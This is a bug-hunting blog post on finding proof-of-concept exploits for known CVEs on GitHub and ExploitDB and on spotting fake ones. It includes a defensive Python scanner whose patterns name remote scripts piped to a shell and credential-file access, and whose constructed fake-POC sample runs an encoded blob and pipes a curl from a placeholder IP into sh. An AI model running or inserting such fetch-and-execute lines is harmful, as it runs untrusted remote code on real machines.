Bug Hunting | www.cyberodisha.com

What Is Proof of Concept (POC)? Definition, Steps & Best Practices

Introduction
You have identified that the target application contains vulnerabilities, but to exploit them you need the proof of concept (POC) exploit code. If you don’t have the exploit code, your only other option is to make it yourself. However, that is beyond the scope of this book.

Github
One of the best places to find exploit code is GitHub. GitHub is an American multinational corporation that provides hosting for software development and version control using Git. It offers the distributed version control and source code management functionality of Git, plus its own features. Developers love GitHub, and hackers do as well.

You can easily search for a CVE on GitHub, as shown in the above image. If there is a POC, you will most likely find it here. However, BE AWARE OF FAKE POCs, as these exploits are not vetted and come from untrusted third parties.
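Because nothing on GitHub is vetted, a downloaded POC should be read before it is run. The following is an added example, not code from the original post: a small Python triage script that scans POC source for patterns a genuine POC rarely needs (encoded blobs, runtime decoding, scripts piped into a shell, hardcoded hosts) and reports which lines deserve a careful look. The indicator list, its labels and both sample files are constructed for illustration.

```python
import base64
import re

# Heuristic indicators that deserve a manual look before a downloaded "POC" is run.
# Patterns and labels are constructed for this example, not an authoritative list.
INDICATORS = [
    ("long base64/hex blob", re.compile(r"[A-Za-z0-9+/=]{60,}|(?:\\x[0-9a-fA-F]{2}){20,}")),
    ("dynamic code execution", re.compile(r"\b(?:eval|exec)\s*\(")),
    ("base64 decoded at runtime", re.compile(r"b64decode|base64\s+(?:-d|--decode)|FromBase64String")),
    ("remote script piped to a shell", re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("encoded PowerShell", re.compile(r"powershell[^\n]*-(?:e|enc|encodedcommand)\b", re.IGNORECASE)),
    ("hardcoded IP address", re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")),
    ("credential or key file access", re.compile(r"\.ssh/|id_rsa|\.aws/credentials|/etc/shadow")),
]


def find_red_flags(source: str) -> list[tuple[str, int, str]]:
    """Return (label, line number, excerpt) for every source line matching an indicator."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((label, lineno, line.strip()[:60]))
    return hits


# Constructed sample 1: presented as a POC, but its real behaviour is hidden in an
# encoded blob and a second-stage script fetched from a hardcoded host.
_BLOB = base64.b64encode(b"constructed filler, not a real payload " * 3).decode()
SUSPICIOUS_POC = f'''#!/usr/bin/env python3
# "PoC for CVE-XXXX-XXXX"  (constructed sample, CVE id is a placeholder)
import base64, os
exec(base64.b64decode("{_BLOB}"))
os.system("curl http://203.0.113.10/setup.sh | sh")
'''

# Constructed sample 2: a plain check that only touches the target passed on the command line.
CLEAN_POC = '''#!/usr/bin/env python3
import sys, requests
url = sys.argv[1] + "/vulnerable/endpoint"
print(requests.get(url, timeout=5).status_code)
'''

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_POC), ("clean", CLEAN_POC)):
        flags = find_red_flags(src)
        print(f"{name}: {len(flags)} flag(s)")
        for label, lineno, excerpt in flags:
            print(f"  line {lineno}: {label}: {excerpt}")
```

A hit is a prompt to read that line, not proof that the POC is fake; a legitimate exploit may well contain a hardcoded address or an encoded payload, which is exactly why the reviewer should understand it before running it.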

ExploitDB
I already mentioned ExploitDB earlier, so I'm not going to talk about it again, but it is a great resource for finding POCs.

● https://www.exploit-db.com/

Summary
9 times out of 10 you are going to find the exploit code you’re looking for on GitHub or on ExploitDB. If you can’t find it in one of those locations, it probably doesn’t exist and you will have to create your own POC. However, don’t be afraid to keep searching. Sometimes the POC code is buried deep in a blog post on the 5th page of Google.

Exploitation
Once you have a working POC you are ready to test it against your target. I always recommend setting up a vulnerable machine and testing the exploit against it first, so you know what to expect from a real target. Once you’re ready, run the exploit against your target and review the results to see whether it is vulnerable or not.

Conclusion
Exploiting known vulnerabilities is one of the oldest tricks in the book. That being said, it’s still one of the best methodologies to use for quick, easy wins. There are really only three steps to this approach: first, determine your target's tech stack; second, search for any vulnerabilities in that tech stack; and finally, run the exploits.
